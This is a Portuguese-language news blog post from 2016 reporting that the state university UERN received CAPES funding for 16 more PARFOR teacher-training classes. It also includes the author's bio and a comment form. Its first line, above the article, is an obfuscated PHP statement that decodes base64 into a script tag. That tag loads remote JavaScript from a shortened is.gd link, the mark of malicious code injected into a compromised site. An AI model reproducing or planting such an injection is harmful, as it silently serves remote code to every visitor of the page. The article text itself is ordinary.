$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

UERN anuncia mais 16 turmas para capacitação de professores do ensino básico

UERN anuncia mais 16 turmas para capacitação de professores do ensino básico
12 Jun 2016
A oferta de outras 16 turmas do Plano Nacional de Formação de Professores da Educação Básica (PARFOR)  foi assegurada pela Coordenação de Aperfeiçoamento de Pessoal de Nível Superior (CAPES), que fez um aditivo ao plano desenvolvido pela UERN no valor de  R$ 2.325.000,00.

 

A UERN irá formar cerca de 500 professores em Pedagogia, Educação Física, Matemática, Letras Espanhol e Letras Inglês, no Campus Central e nos  Campi Avançados de Assú e Pau dos Ferros. “Vamos dar início às novas turmas nos dias 5 e 6 de agosto”, adianta a Coordenadora Institucional do PARFOR na UERN, Professora Helena Perpétua de Aguiar Ferreira, considerando que a UERN está assumindo um desafio de mais 4 anos.
A professora Helena Perpétua destaca que o que mais incentiva é ver que no meio de uma crise que atinge todas as universidades brasileiras, a UERN conseguiu recursos para a ampliação do PARFOR. Esse foi o fato que também chamou mais atenção da diretora da Faculdade de Educação (FE), professora Maria Auxiliadora Alves Costa. “Estou voltando hoje de um Fórum de Educadores realizado em Florianopólis e o que mais discutimos foi o corte nos programas federais”, afirma, considerando que a dotação de mais recursos para o PAFOR da UERN, dentro desse contexto de crise, representa o bom trabalho que está sendo feito pela instituição.

 

Considerando o PARFOR um projeto inovador, o reitor Pedro Fernandes recebeu a confirmação de mais recursos para a UERN com entusiasmo. “A UERN tem uma forte ligação com a educação básica”, repetiu, relembrando que a UERN é quem forma professor no interior do Estado.  Em Mossoró, 94% dos professores da rede de ensino são graduados pela UERN e nos outros municípios, chega a 100%.

 

A coordenação do PARFOR está fazendo um levantamento para traçar o perfil e reunir dados estatísticos sobre a presença do PARFOR no Rio Grande do Norte.
share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *